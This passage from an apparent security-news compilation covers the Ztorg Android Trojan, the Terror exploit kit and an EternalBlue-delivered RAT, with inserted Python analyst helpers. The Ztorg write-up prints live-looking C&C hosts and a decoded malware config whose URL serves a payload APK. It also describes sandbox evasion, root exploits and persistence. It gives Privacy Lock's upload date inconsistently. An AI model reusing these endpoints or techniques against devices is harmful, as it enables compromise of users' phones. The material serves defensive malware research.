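        ts_s, client, _method, url, status = parts
        ts = int(ts_s)
        if status == "302":
            last_302[client] = (ts, url)   # remember the bounce per client
            continue
        cves = cves_in_url(url)
        if not cves:
            continue
        gate = last_302.get(client)
        findings.append({
            "client": client,
            "url": url,
            "cves": cves,
            "gate": gate[1] if gate and ts - gate[0] <= window else None,
        })
    return findings
```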

The page uses obfuscated JavaScript code to determine the victim’s browser environment, then uses the return value of this function to submit a hidden form called ‘frm’.

“As mentioned in the executive overview, it uses some obfuscated Javascript code to evaluate the victim’s browser environment, for example it tries to get version information about the following plugins: ActiveX, Flash, PDF reader, Java, Silverlight, QuickTime, etc. Then it uses the return value of this function to submit the hidden form called ‘frm’.” continues the analysis.

The EK also uses cookie-based authentication for downloading the exploits, which prevents third-parties from accessing them, the security researchers discovered. This approach prevents not only investigators from learning where from or how the victims were infected, but also stops competitors from stealing the exploits.

“We have seen that the exploit kit market is experiencing an ongoing change. Big players in this market disappear while new ones show up. The new players are fighting for customers by constantly improving their quality and techniques. They modify these techniques on an ongoing basis to improve their capability to bypass security tools. This clearly shows how important it is to make sure that all your systems are up to date,” concluded Talos.


Ztorg: money for infecting your smartphone
22.5.2017 Kaspersky  Mobil

This research started when we discovered an infected Pokémon GO guide in Google Play. It was there for several weeks and was downloaded more than 500,000 times. We detected the malware as Trojan.AndroidOS.Ztorg.ad. After some searching, I found some other similar infected apps that were being distributed from the Google Play Store. The first of them, called Privacy Lock, was uploaded to Google Play on 15 December 2016. It was one of the most popular Ztorg modifications, with more than 1 million installations.

After I started tracking these infected apps, two things struck me – how rapidly they became popular and the comments in the user review sections.

Popularity

These infected apps quickly became very popular, gaining thousands of new users each day!

For example, com.fluent.led.compass had 10,000–50,000 installations the day I found and reported it to Google.

However, it still wasn’t deleted from Google Play the next day and the number of installations increased tenfold to 100,000–500,000. It means there were at least 50,000 new infected users in the space of just one day.

Comments

There were lots of comments saying that people downloaded these apps for credits/coins/etc.

In some of these comments the users mentioned other apps – Appcoins, Advertapp, etc.

That’s where this latest research work started.

Advertising

Apps that pay users

The app mentioned most in the comments was Appcoins, so I installed it. After that, the app prompted me to install some other apps, including one that was malicious, for $0.05.

To be honest, I was surprised that only one was malicious – all the other apps were clean.

The funny thing is that they check for root rights on the device and don’t pay those that have them. And the first thing that Ztorg did on the device after infection started was to get superuser rights.

I contacted the Appcoins developers to try and find out where this malicious advertising offer came from, but they deleted the offer and answered me by saying there was no malware and that they had done nothing wrong.

Then I analyzed the apps installed by infected users and made a list of the most popular ones that paid users to install software:

mobi.appcoins

https://play.google.com/store/apps/details?id=mobi.appcoins

com.smarter.superpocket

https://play.google.com/store/apps/details?id=com.smarter.superpocket

com.moneyreward.fun

https://play.google.com/store/apps/details?id=com.moneyreward.fun

And of course they offered malware too:

All these offered users 0.04-0.05 USD for installing an app infected with Ztorg from Google Play.

Campaigns

So I decided to take a closer look at these offers and the dumped traffic for these apps.

A typical session in which an advertising app turned into a malicious one was as follows:

1. The app receives offers, including malicious ones, from its server (for example, moneyrewardfun[.]com). Malicious offers are sent from well-known ad services (usually supersonicads.com and aptrk.com).

2. After a few redirections through ad service domains (in one case there were 27 redirections) the app reaches global.ymtracking.com or avazutracking.net. These URLs are also related to the ads.

3. It is then redirected to track.iappzone.net.

4. The final URL, which leads to the Google Play Store, is on app.adjust.com.

All the offers that I was able to dump had track.iappzone.net and app.adjust.com.

adjust.com is a well-known “business intelligence platform”; the URLs that are used in malicious campaigns look like this:

https://app.adjust.com/4f1lza?redirect=https://play.google.com/store/apps/details?id=com.game.puzzle.green&install_callback=http://track.iappzone.net…

By analyzing these URLs we can identify infected apps on Google Play.

Malicious server

URLs from iappzone.net look like this:

http://track.iappzone.net/click/click?offer_id=3479&aff_id=3475&campaign=115523_201|1002009&install_callback=http://track.supersonicads.com/api/v1/processCommissionsCallback.php?advertiserId=85671&password=540bafdb&dynamicParameter=dp5601581629793224906

This URL structure (offer_id=..&aff_id=..&campaign=..) matches the OffersLook tracking system. It carries several interesting values, such as the offer id and the affiliate id, but the cybercriminals use different values for them in each campaign, which makes these parameters useless for tracking. The exception is install_callback: this parameter contains the name of the ad service.

While searching for iappzone.net I was able to find some APK files that contained this URL. All of those files are detected by Kaspersky Lab products as Ztorg malware. The interesting thing was that iappzone.net used the IP 52.74.22.232. The same IP was used by aedxdrcb.com, which was mentioned in CheckPoint’s gooligan report. A few weeks after that report was made public, iappzone.net (which wasn’t mentioned in the report) was moved to a new IP – 139.162.57.41.

Ad modules

Luckily I was able to find iappzone.net not only in the APK files but also in network traffic from clean apps. All these apps had an advertising module – Batmobi or Mobvista in most cases. Network traffic from these ad modules looked similar to the network traffic from the apps that paid users to install promoted apps.

Here is an example of an app with a Batmobi ad module. The module received a JSON file with offers from their server api2.batmobil.net.

The user sees a list of advertised apps:

After the user clicks on the ads, they are redirected to the Google Play Store.

In this case, the redirects look like this:

api2.batmobil.net -> global.ymtracking.com -> tracking.acekoala.com -> click.apprevolve.com -> track.iappzone.net -> app.adjust.com -> play.google.com

After analyzing ad campaigns containing iappzone.net, I was able to find almost 100 infected apps being promoted on Google Play.

The other interesting aspect of these campaigns was that their URLs contained the install_callback parameter that I mentioned earlier. It turns out the cybercriminals only used four ad networks.

Ad sources

track.iappzone.net callbacks

| Ad network | Callback host | Share of callbacks |
|---|---|---|
| Yeahmobi | global.ymtracking.com | 41% |
| Mobvista | next.mobvista.com | 34% |
| Avazu | postback.apx.avazutracking.net | 18% |
| Supersonicads | track.supersonicads.com | 7% |

However, this doesn’t mean that malware was only being distributed through these four networks. These ad networks are selling their ads to a wide range of advertising companies. In my research, I saw some malicious ads coming from other advertising networks like DuAd or Batmobi, but after a few redirects these ads were always pointing to one of the four advertising networks listed above.

Furthermore, I tracked several malicious ad campaigns that looked like this:

Batmobi -> Yeahmobi-> SupersonicAds

which means that these networks also redistribute ads to each other.

I wasn’t able to find any other ad networks in the install_callback parameter until the end of March 2017.
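
The URL analysis described above (extracting the promoted Play package from an app.adjust.com redirect, the ad network from the install_callback parameter, the two hosts every dumped offer passed through, and the per-network share), as an added example that is not code from the original research. The track.iappzone.net URL and the Batmobi redirect chain are the ones quoted above; the adjust.com URL (the EXAMPLE token and the com.example.constructed package) and the callback list used for the share are constructed.

```python
"""Hunting helpers for the Ztorg ad-campaign URLs described above.
Added example, not code from the original research; values marked
'constructed' are made up to match the structure shown on the page."""
from collections import Counter
from urllib.parse import parse_qs, urlparse

# install_callback hosts and the ad networks they belong to (from the table above).
CALLBACK_NETWORKS = {
    "global.ymtracking.com": "Yeahmobi",
    "next.mobvista.com": "Mobvista",
    "postback.apx.avazutracking.net": "Avazu",
    "track.supersonicads.com": "Supersonicads",
}

# Every malicious offer the author dumped passed through both of these hosts.
CAMPAIGN_HOSTS = {"track.iappzone.net", "app.adjust.com"}

# Tracking URL quoted on the page (OffersLook-style parameters).
IAPPZONE_URL = (
    "http://track.iappzone.net/click/click?offer_id=3479&aff_id=3475"
    "&campaign=115523_201|1002009&install_callback=http://track.supersonicads.com"
    "/api/v1/processCommissionsCallback.php?advertiserId=85671&password=540bafdb"
    "&dynamicParameter=dp5601581629793224906"
)

# Constructed adjust.com URL with the same shape as the one quoted on the page.
CONSTRUCTED_ADJUST_URL = (
    "https://app.adjust.com/EXAMPLE?redirect=https://play.google.com/store/apps/details"
    "?id=com.example.constructed&install_callback=http://track.iappzone.net/click/click?offer_id=1"
)

# Redirect chain quoted on the page for an app with a Batmobi ad module.
BATMOBI_CHAIN = [
    "api2.batmobil.net", "global.ymtracking.com", "tracking.acekoala.com",
    "click.apprevolve.com", "track.iappzone.net", "app.adjust.com", "play.google.com",
]


def host_of(entry: str) -> str:
    """Hostname of a URL, or the entry itself when it is a bare hostname."""
    return urlparse(entry if "://" in entry else "http://" + entry).netloc.lower()


def query_params(url: str) -> dict:
    """{name: first value} for the query string. The nested URLs in these campaigns
    are not percent-encoded, so an inner '&' ends the value; the fields we need
    (redirect target, install_callback host) sit before any inner '&'."""
    return {k: v[0] for k, v in parse_qs(urlparse(url).query).items()}


def promoted_package(adjust_url: str):
    """Google Play package id behind an app.adjust.com redirect, or None."""
    target = query_params(adjust_url).get("redirect")
    if not target:
        return None
    t = urlparse(target)
    if t.netloc != "play.google.com" or t.path != "/store/apps/details":
        return None
    return query_params(target).get("id")


def callback_host(tracking_url: str):
    """Host named in install_callback, i.e. the ad network's tracker, or None."""
    callback = query_params(tracking_url).get("install_callback")
    return host_of(callback) if callback else None


def ad_network(tracking_url: str) -> str:
    """One of the four networks from the table, or 'other'."""
    return CALLBACK_NETWORKS.get(callback_host(tracking_url), "other")


def is_campaign_chain(chain) -> bool:
    """True when a redirect chain passes through track.iappzone.net and app.adjust.com."""
    return CAMPAIGN_HOSTS <= {host_of(entry) for entry in chain}


def network_share(tracking_urls) -> dict:
    """Percentage of offers per ad network, rounded to whole numbers."""
    counts = Counter(ad_network(u) for u in tracking_urls)
    total = sum(counts.values())
    if not total:
        return {}
    return {net: round(100 * n / total) for net, n in counts.items()}


if __name__ == "__main__":
    print(query_params(IAPPZONE_URL)["offer_id"], ad_network(IAPPZONE_URL))
    print(promoted_package(CONSTRUCTED_ADJUST_URL), is_campaign_chain(BATMOBI_CHAIN))
```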

Other sources

During my research I found some infected apps that were not promoted by these advertising networks. When I looked at their detection paths I found that there were several patterns to them. Most of the paths where these apps were detected (except the installation path /data/app) were as follows:

[sdcard]/.android/ceroa/play/
[sdcard]/.nativedroid/download/
[sdcard]/.sysAndroid/download/
[sdcard]/.googleplay_download/
[sdcard]/.walkfree/apks/583737491/
[sdcard]/Android/data/TF47HV2VFKD9/
[sdcard]/Android/Data/snowfoxcr/
[sdcard]/DownloadProvider/download/

I analyzed the apps using these paths and discovered that all of them are already detected by Kaspersky Lab products as adware or malware. However, the apps downloaded to these folders are not all malicious – most of them are clean.

| Folder name | Type | Detection %* |
|---|---|---|
| DownloadProvider | Malware | 81% |
| TF47HV2VFKD9 | Malware | 56% |
| snowfoxcr | AdWare | 51% |
| nativedroid | Malware | 48% |
| .walkfree | AdWare | 33% |
| ceroa | AdWare | 20% |
| sysAndroid | Malware | 16% |
| .googleplay_download | Malware | 15% |

* Malicious apps that were downloaded to a specific folder as a percentage of all apps in that folder.

Infected apps

Similar apps

All the infected apps that I analyzed surprised me in that they don’t look like they were patched with malware code. In many other cases, cybercriminals just add malicious code to clean apps, but not in this case. Looks like these apps were created especially for distributing malware.

Publishers from Google Play

Some of the publishers’ emails from Google Play:

| Package name | Publisher email |
|---|---|
| com.equalizer.goods.listener | trantienfariwuay@gmail.com |
| com.ele.wall.papers | nguyenduongsizang@gmail.com |
| com.game.free.plus.prefect | liemproduction08@gmail.com |
| com.green.compass.star | longhahoanghuong@gmail.com |
| com.voice.equalizer.musicssss | baoanstudio@gmail.com |
| com.amusing.notes.done | trunggapin@gmail.com |
| com.booster.ram.app.master.clean | lakonmesminh@gmail.com |
| com.game.puzzle.green | zentinlong@gmail.com |
| com.listen.music.pedometer | tramhuyenthoai9a@gmail.com |
| com.live.paper.watch.analog | nguyenthokanuvuong@gmail.com |

When I started to search for them, I found that most of the emails are related to Vietnam.

For example:

trantienfariwuay -> tran tien [fariwuay] – Vietnamese singer

liemproduction08 -> liem production [08] – Thuat Liem Production, company from Ho Chi Minh City, Vietnam

nguyenthokanuvuong -> nguyen [thokanu] vuong – Vietnamese version of Chinese name Wang Yuan

Malicious modules

Almost all of the infected apps from Google Play contain the same functionality – to download and execute the main module. During this research, I found three types of modules with this functionality.

Dalvik

Every infected app from Google Play with this type of malicious module was protected by a packer. I will describe the app with the package name com.equalizer.goods.listener. It was packed using the Qihoo packer. This app has many different classes and only a few of them are related to the malicious module. The malicious code is triggered by the PACKAGE_ADDED and PACKAGE_REMOVED system events. This means that the malicious code only starts executing after the user installs, updates or removes an app.

As a first step, the malicious module checks whether it is running on a virtual machine, emulator or sandbox. To do so, it checks for several dozen files that exist on such machines and several dozen values of different system properties. If this check is passed, the Trojan starts a new thread.

In this new thread the Trojan will wait a random amount of time, between an hour and an hour and a half. After waiting it will make a GET HTTP request to the C&C (em.kmnsof.com/only) and, as a result, the Trojan will receive a JSON file encrypted with DES. This JSON should contain a URL from which a file can be downloaded. The file is an ‘xorred’ JAR that contains the malicious classes.dex – the main module.

Native

Since October 2016 I’ve reported lots of apps with this malicious module to Google, so they were able to improve their detection system and catch almost all of them. This meant the cybercriminals had to bypass this detection. In the beginning they changed some methods in the code and used commercial packers. But in February 2017 they rewrote the entire code, moving all functionality to the ELF (native, .so) library.

Example: com.unit.conversion.use (MD5: 92B02BB80C1BC6A3CECC321478618D43)

The malicious code is triggered after app execution starts from the onCreate method.

The malicious code in the infected classes.dex is simple: it starts a new thread that loads the MyGame library, and it contains two methods for sandbox detection that are called from the library.

In this version, the delays are much smaller than in the previous one – it waits only 82 seconds before execution.

After starting, the MyGame library will check if it’s running in a sandbox by executing the two methods from classes.dex. One will try to register the receiver for the BATTERY_CHANGED action and check if it’s correct. Another method will try to get application info about the com.android.vending package (Google Play Store) with the MATCH_UNINSTALLED_PACKAGES flag. If both of these methods return “false”, the malicious library will execute a GET request to the command server.

It receives the following reply:

“BEgHSARIB0oESg4SEhZcSUkCCRFICAUSHwoLEhZIBQkLSQ4fSQ4fVlZVSQEWVlZVSAcWDUpeVg==”

The library base64-decodes this answer and XORs it with the single-byte key 0x66.

Result:

b.a.b.a,b,http://dow.nctylmtp.com/hy/hy003/gp003.apk,80

g_class_name = b.a.b.a

g_method_name = b

g_url = http://dow.nctylmtp.com/hy/hy003/gp003.apk

g_key = 80

The .apk file available at g_url is downloaded into the app’s cache folder (/data/data/<package_name>/cache). The library XORs it with g_key and loads it using a ClassLoad method from the DexClassLoader class.

As we can see, the cybercriminals changed a lot in the malicious code, and replaced the Java code with C code. But the functionality remains the same – connect to the C&C, download and execute the main module.

Detection bypassing

Once I was able to receive the package IDs from these campaigns, I installed the infected app from Google Play on my test device and… nothing happened. After some investigating, I found that the cybercriminals only return a malicious payload to users that install apps via ads. However, some of the other infected apps started to infect my test phone when installed directly from Google Play – without clicking on any ads.

Dropper

In April 2017 the cybercriminals changed their Ztorg code again. In this third type of malicious module, the cybercriminals moved all the functionality back to classes.dex. The main difference with the previous version is that it’s no longer a Trojan-Downloader. It doesn’t download the main module from a malicious server; instead it contains an encrypted module in the Assets folder of the installation package. The file called info.data is xored with 0x12 and then loaded using the ClassLoad method.
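
Decoding the C&C reply shown in the Native section and recovering the single-byte XOR key of a downloaded or dropped module (the MyGame library’s g_key, the Dalvik variant’s xorred JAR, the dropper’s 0x12-xored info.data), as an added example that is not the malware’s or the researcher’s code. The reply string and the key 0x66 are the ones quoted above; the encoded module blob is constructed.

```python
"""Analyst helpers for the Ztorg module configuration described above.
Added example, not code from the original research or from the malware."""
import base64
from dataclasses import dataclass

# Magic bytes of the two containers the main module arrives in:
# a JAR/ZIP (Dalvik and native variants) or a bare classes.dex.
KNOWN_MAGIC = (b"PK\x03\x04", b"dex\n")

# Reply quoted on the page, returned by the C&C to the MyGame library.
CNC_REPLY = "BEgHSARIB0oESg4SEhZcSUkCCRFICAUSHwoLEhZIBQkLSQ4fSQ4fVlZVSQEWVlZVSAcWDUpeVg=="


@dataclass(frozen=True)
class ModuleConfig:
    """The four fields the library extracts from the decoded reply."""
    g_class_name: str
    g_method_name: str
    g_url: str
    g_key: int


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte with one key byte (the scheme all three module types use)."""
    if not 0 <= key <= 255:
        raise ValueError("key must be a single byte")
    return bytes(b ^ key for b in data)


def decode_cnc_reply(reply: str, key: int = 0x66) -> ModuleConfig:
    """Base64-decode the reply, XOR it with the key, split the comma-separated fields."""
    plain = xor_bytes(base64.b64decode(reply), key).decode("ascii")
    fields = plain.split(",")
    if len(fields) != 4:
        raise ValueError(f"unexpected field count {len(fields)} in {plain!r}")
    class_name, method_name, url, key_str = fields
    return ModuleConfig(class_name, method_name, url, int(key_str))


def recover_xor_key(blob: bytes):
    """Brute-force the single-byte key of an encoded module by looking for a known
    container magic in its first four bytes; None when no key yields one."""
    head = blob[:4]
    for key in range(256):
        if xor_bytes(head, key) in KNOWN_MAGIC:
            return key
    return None


def decode_module(blob: bytes) -> bytes:
    """Decode a module whose key is not known in advance (e.g. info.data)."""
    key = recover_xor_key(blob)
    if key is None:
        raise ValueError("no single-byte XOR key produces a JAR or DEX header")
    return xor_bytes(blob, key)


# Constructed stand-in for a downloaded module on disk: a ZIP local-file header
# start plus filler, encoded with the g_key (80) from the decoded reply.
CONSTRUCTED_MODULE = xor_bytes(b"PK\x03\x04" + b"\x00" * 12 + b"constructed-jar-body", 80)

if __name__ == "__main__":
    print(decode_cnc_reply(CNC_REPLY))
    print("recovered key:", recover_xor_key(CONSTRUCTED_MODULE))
```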

Payload (main module)

In all the attacks that I analyzed the main module had the same functionality. I’ll describe one of the most recent – 2dac26e83b8be84b4a453664f68173dd. It was downloaded by the com.unit.conversion.use app using the malicious MyGame library.

This module is downloaded by the infection module and loaded using the ClassLoad method. The main purpose of the module is to gain root rights and install other modules. It does this by downloading or dropping some files.

Some files can only be dropped from this module; there are no URLs for them.

Some of the URLs with the down.118pai.com domain didn’t work at the time of this research. All files that have these URLs can be dropped. All files that have URLs only and cannot be dropped have URLs with the domains sololauncher.mobi and freeplayweb.com, which were accessible at the time of this research.

In one of the previous versions of the main module, dated September 2016, all the URLs had the down.118pai.com domain and were available at that time.

Some of the dropped/downloaded malicious files are added to the /system/etc/install-recovery.sh file. This means that these files remain on the device even after a reset to factory settings.

All files that are dropped and downloaded by this module can be divided into a few groups:

Clean files, tools

| File name | Tool name | MD5 |
|---|---|---|
| data/files/.zog/.a | chattr | 9CAE8D66BE1103D737676DBE713B4E52 |
| data/files/.zog/.a | chattr | 1E42373FA7B9339C6C0A2472665BF9D4 |
| data/files/.zog/supolicy | supolicy | cdceafedf1b3c1d106567d9ff969327a |
| data/files/.zog/busybox | busybox | 3bc5b9386c192d77658d08fe7b8e704f |
| data/files/.zog/.j | Patched su | 8fb60d98bef73726d4794c2fc28cd900 |

Exploits, exploit packs, exploit droppers

| File name | Name | MD5 | Detection name |
|---|---|---|---|
| data/files/.Ag/Agcr | Agcr32 | D484A52CFB0416CE5294BF1AC9346B96 | Exploit.AndroidOS.Lotoor.bv |
| data/files/.Ag/Agcr | Agcr64 | B111DD21FD4FCEFDC8268327801E55CE | Exploit.AndroidOS.Lotoor.bv |
| data/files/.zog/.ag/bx | Bx | 70EBFA94C958E6E6A7C6B8CD61B71054 | Exploit.AndroidOS.Lotoor.bu |
| data/files/.zog/.ag/cx | cx | 892E033DA182C06794F2B295377B8A65 | Exploit.AndroidOS.Lotoor.bu |
| data/files/.zog/exp | exp | 6E17234C57308012911C077A376538DC | Exploit.AndroidOS.Lotoor.bz |
| data/files/.zog/.ag/nn.zip | maink.apk/boy | ab9202ccfdd31e685475ba895d1af351 | script |
| data/files/.zog/.ag/nn.zip | maink.apk/bx | 70ebfa94c958e6e6a7c6b8cd61b71054 | Exploit.AndroidOS.Lotoor.bu |
| data/files/.zog/.ag/ym | ym32 | F973BAA67B170AB52C4DF54623ECF8B3 | Exploit.AndroidOS.Lotoor.bu |
| data/files/.zog/.ag/ym | ym64 | 807A6CF3857012E41858A5EA8FBA1BEF | Exploit.AndroidOS.Lotoor.bu |
| data/files/.zog/.aa | mainp.apk/r1 | c27e59f0f943cf7cc2020bda7efb442a | Exploit.AndroidOS.Lotoor.bh |
| data/files/.zog/.aa | mainp.apk/r2 | 368df668d4b62bdbb73218dd1f470828 | Exploit.AndroidOS.Lotoor.bi |
| data/files/.zog/.aa | mainp.apk/r3 | fb8449d1142a796ab1c8c1b85c7f6569 | Exploit.AndroidOS.Lotoor.bh |
| data/files/.zog/.aa | mainp.apk/r4 | 04dd488783dffcfd0fa9bbac00dbf0f9 | Exploit.Linux.Enoket.a |
| data/files/.zog/.ad | mainmtk.apk | b4b805dc90fa06c9c7e7cce3ab6cd252 | Exploit.AndroidOS.Lotoor.bi |
| data/files/.zog/.ag/np | np | 1740ae0dc078ff44d9f229dccbd9bf61 | Exploit.Linux.Enoket.a |

Most of these files are downloaded by the Trojan, but some of them can only be dropped from the Trojan body. However, most of the downloaded files are the same as they were seven months ago, in September 2016.

Native (ELF) malicious modules

| File name | MD5 | Path after infection | Detection name |
|---|---|---|---|
| data/files/.zog/.am | b30c193f98e83b7e6f086bba1e17a9ea | /system/xbin/.gasys | Backdoor.AndroidOS.Ztorg.j |
| data/files/.zog/.an | 41ab20131f53cbb6a0fb69a143f8bc66 | /system/lib/libgstdsys.so | Backdoor.AndroidOS.Ztorg.j |
| data/files/.zog/.b | ae822aed22666318c4e01c8bd88ca686 | /system/xbin/.gap.a | Backdoor.AndroidOS.Ztorg.c |
| data/files/.zog/.k | 5289027ca9d4a4ed4663db445d8fc450 | /system/bin/debuggerd | Backdoor.AndroidOS.Ztorg.c |
| data/files/.zog/.m | 5af47875666c9207110c17bc8627ce30 | /system/bin/ddexe | script |
| data/files/.zog/.c | d335ac148f6414f0ce9c30ac63c20482 | /system/xbin/.gap | Backdoor.AndroidOS.Ztorg.c |

All of these files can only be dropped from the Trojan’s body. They are not downloaded.

Malicious apps

| File name | Name | MD5 | Path after infection | Detection name |
|---|---|---|---|---|
| data/files/.zog/.l | mains.apk | 87030ae799e72994287c5b37f6675667 | /system/priv-app/dpl.apk | Trojan-Dropper.AndroidOS.Agent.cv |
| data/files/.zog/.o | mains2.apk | 93016a4a82205910df6d5f629a4466e9 | /system/priv-app/.gmq.apk | Trojan.AndroidOS.Boogr.gsh |
| data/files/.zog/.n | mainm.apk | 6aad1baf679b42adb55962cdb55fb28c | /system/priv-app/.gma.apk | Backdoor.AndroidOS.Ztorg.a |
| data/files/.zog/.al | .al | 7d7247b4a2a0e73aaf8cc1b5c6c08221 | /system/priv-app/.gmtgp.apk | Trojan.AndroidOS.Hiddad.c |

.gmtgp.apk (7d7247b4a2a0e73aaf8cc1b5c6c08221)

This app is detected as Trojan.AndroidOS.Hiddad.c. It downloads (from the C&C http://api.ddongfg.com/pilot/api/) an additional encrypted module, decrypts and loads it. In my case it downloads Trojan-Clicker.AndroidOS.Gopl.a (af9a75232c83e251dd6ef9cb32c7e2ca).

Its C&C is http://g.ieuik.com/pilot/api/; additional domains are g.uikal.com and api.ddongfg.com.

The Trojan uses accessibility services to install (or even buy) apps from the Google Play Store.

It also downloads apps into the .googleplay_download directory on the SD card and installs them using accessibility services to click buttons. The folder .googleplay_download is one of the sources used to spread the Ztorg Trojan. It can click buttons that use one of 13 languages – English, Spanish, Arabic, Hindi, Indonesian, French, Persian, Russian, Portuguese, Thai, Vietnamese, Turkish and Malay.

dpl.apk (87030AE799E72994287C5B37F6675667)

This module contains the same methods to detect emulators, sandbox and virtual machines as in the original infected module.

It downloads an encrypted file from the C&C api.jigoolng.com/only/gp0303/12.html into the file /.androidsgqmdata/isgqm.jar. After decryption, the Trojan loads this file.

The main purpose of dpl.apk is to download and install apps. It receives commands from the following C&Cs:

log.agoall.com/gkview/info/,
active.agoall.com/gnview/api/,
newuser.agoall.com/oversea_adjust_and_download_write_redis/api/download/,
api.agoall.com/only/

The module downloads them into the DownloadProvider directory on the SD card. This folder is one of the sources used to distribute the Ztorg Trojan.

In my case, it downloaded five malicious APKs; four of them were installed and listed in the Installed apps section.

.gma.apk (6AAD1BAF679B42ADB55962CDB55FB28C)

This Trojan tries to download the additional isgqm.jar module with the main functionality in the same way as the other modules. Unfortunately, its C&Cs (a.gqkao.com/igq/api/, d.oddkc.com/igq/api/, 52.74.240.149/igq/api, api.jigoolng.com/only/) didn’t return any commands, so I don’t know the main purpose of this app.

This app can modify /system/etc/install-recovery.sh, and download files to the /.androidgp/ folder on the SD card. These files will be installed in the system folders (/system/app/ or /system/priv-app/).

I assume this Trojan is needed to update other modules.

.gmq.apk (93016a4a82205910df6d5f629a4466e9)

This Trojan wasn’t able to download its additional module isgq.jar from the C&Cs (a.apaol.com/igq/api, c.oddkc.com/igq/api, 52.74.240.149/igq/api).

Installed apps

The following apps were silently downloaded and installed on the device after infection. All of them have some well-known ad services.

| Package name | Detection | MD5 | Ad modules |
|---|---|---|---|
| co.uhi.tadsafa | Trojan-Downloader.AndroidOS.Rootnik.g | d1ffea3d2157ede4dcc029fb2e1c3607 | mobvista, batmobi |
| com.friend.booster | Trojan.AndroidOS.Ztorg.bo | 5c99758c8622339bffddb83af39b8685 | mobvista, batmobi |
| sq.bnq.gkq | Trojan-Downloader.AndroidOS.Rootnik.g | 10272af66ab81ec359125628839986ae | mobvista, batmobi |
| main.ele.com.blood | Trojan.AndroidOS.Ztorg.bo | 8572aec28df317cd840d837e73b2554a | mobvista |

They also have malicious modules that start downloading ads and apps when commanded by their C&C.

But using clean advertising networks like Mobvista and Batmobi creates an ad recursion, because these ads were used to distribute the original infected app.

A few new folders appear on the SD card after a successful infection. Among them:

.googleplay_download
.nativedroid
.sysAndroid
DownloadProvider

All of these folders were used by some of the malware to spread the initial Ztorg infection and were used after infection to distribute other apps – some of them malicious.

Other Trojans

Although almost every Trojan from Google Play found during this research had one of the three malicious modules described above, there were also a few other Trojans.

One of them, called Money Converter (com.countrys.converter.currency, 55366B684CE62AB7954C74269868CD91), had been installed more than 10,000 times from Google Play. Its purpose is similar to that of the .gmtgp.apk module – it uses Accessibility Services to install apps from Google Play. Therefore, the Trojan can silently install and run promoted apps without any interaction with the user, even on updated devices where it cannot gain root rights.

It used the same command and control servers as .gmtgp.apk.

Conclusion

During the research period I found that Trojan.AndroidOS.Ztorg was uploaded to Google Play Store almost 100 times as different apps. The first of them was called Privacy Lock, had more than 1 million installations and was uploaded in mid-December 2015. Every month after I started tracking this Trojan in September 2016 I was able to find and report at least three new infected apps on Google Play. The most recent apps that I found were uploaded in April 2017, but I’m sure there will be more soon.

All of these apps were popular. Furthermore, their popularity grew very fast, with tens of thousands of new users sometimes being infected each day.

I found out that these Trojans were actively distributed through advertising networks. All these malicious campaigns contained the same URL, which allows me to easily track down any new infected apps.

I was surprised that these Trojans were distributed through apps that were paying users for installing promoted apps. It turned out that some users got paid a few US cents for infecting their device, though they didn’t know it was being infected.

Another interesting thing about the distribution of this Trojan is that after infection it used some of the advertising networks to show infected users ads about installing promoted apps. It creates a kind of ad recursion on infected devices – they become infected because of a malicious ad from an advertising network and after infection they see ads from the same advertising network because of the Trojan and its modules.

Cybercriminals were able to publish infected apps on Google Play because of the numerous techniques they used to bypass detection. They continued to develop and use new features in their Trojans all the time. This Trojan has a modular architecture: it uses several modules with different functionality, and each of them can be updated via the Internet. During infection Ztorg uses several local root exploit packs to gain root rights on a device. Using these rights allows the Trojan to achieve persistence on the device and deliver ads more aggressively.


Terror Exploit Kit Gets Fingerprinting Capabilities

22.5.2017 securityweek Exploit
Recent changes made to the Terror exploit kit (EK) allow it to fingerprint victims and target specific vulnerabilities instead of carpet bombing the victims with many exploits at the same time, Talos researchers discovered.

Terror was initially detailed in January this year, when security researchers observed that it was targeting vulnerabilities with exploits taken from Metasploit or from either Sundown or Hunter EKs. Terror activity increased last month, after the Sundown EK inexplicably disappeared from the threat landscape.

Previously, the EK was observed carpet bombing victims with many exploits at the same time, even if those exploits didn’t match the targeted browser environment. Now, the threat has added more exploits and is fingerprinting the victim’s system to determine which exploit would be successful based on operating system, patch level, browser version, and installed plugins.

The use of more targeted exploits makes it more difficult for investigators to determine which exploits the toolkit has. However, “it is interesting to note that the adversaries are using an URL parameter in cleartext for the vulnerability they are going to exploit,” Talos says.

Additionally, Talos researchers identified a potentially compromised legitimate web site that appears to be operating as a malware gate. Initially redirecting visitors to a RIG landing page, the gate switched to Terror after a single day.

The compromised website redirects users to the EK landing page by using an HTTP 302 Moved Temporarily response. The page uses obfuscated JavaScript code to evaluate the victim's browser environment, then uses the return value of this function to submit a hidden form called ‘frm’.

More proof that the EK has moved away from its carpet bombing approach is the manner in which it selects exploits when attempting to infect the victim. The researchers were served different files when accessing the site via Internet Explorer 11 than when using Internet Explorer 8.

The EK also uses cookie-based authentication for downloading the exploits, which prevents third-parties from accessing them, the security researchers discovered. This approach prevents not only investigators from learning where from or how the victims were infected, but also stops competitors from stealing the exploits.

“We have seen that the exploit kit market is experiencing an ongoing change. Big players in this market disappear while new ones show up. The new players are fighting for customers by constantly improving their quality and techniques. They modify these techniques on an ongoing basis to improve their capability to bypass security tools. This clearly shows how important it is to make sure that all your systems are up to date,” Talos concludes.


Stealth Backdoor Abused NSA Exploit Before WannaCrypt

22.5.2017 securityweek BigBrothers
In the aftermath of the WannaCry ransomware outbreak, security researchers discovered numerous attacks that have been abusing the same EternalBlue exploit for malware delivery over the past several weeks.

Targeting a Server Message Block (SMB) vulnerability on TCP port 445, the exploit was made public in April by the group of hackers calling themselves “The Shadow Brokers” and is said to have been stolen from the National Security Agency-linked Equation Group. The targeted flaw was patched in March.

The fast spreading WannaCry brought EternalBlue to everyone’s attention, yet other malware families have been using it for infection long before the ransomware started using it. One of them was the Adylkuzz botnet, active since April 24, researchers revealed.

Now, Cyphort says that evidence on a honeypot server suggests attacks on SMB were active in early May, and they were dropping a stealth Remote Access Trojan (RAT) instead of ransomware. The malware didn’t have the worm component and didn’t spread like WannaCry.

The malware appears to have been distributed from an IP (182.18.23.38) located in China. Following successful exploitation, an encrypted payload is sent as a shellcode, and the security researchers found a DLL embedded in the shellcode, which they say “is basically a Trojan which downloads additional malware and receives commands from its controller.”

One of the files downloaded by this malware is meant to close port 445, thus preventing other malware from abusing the same flaw. Another file is believed to be a second-stage payload. The RAT sets a series of Registry Run entries to download and execute additional malware, the researchers say.

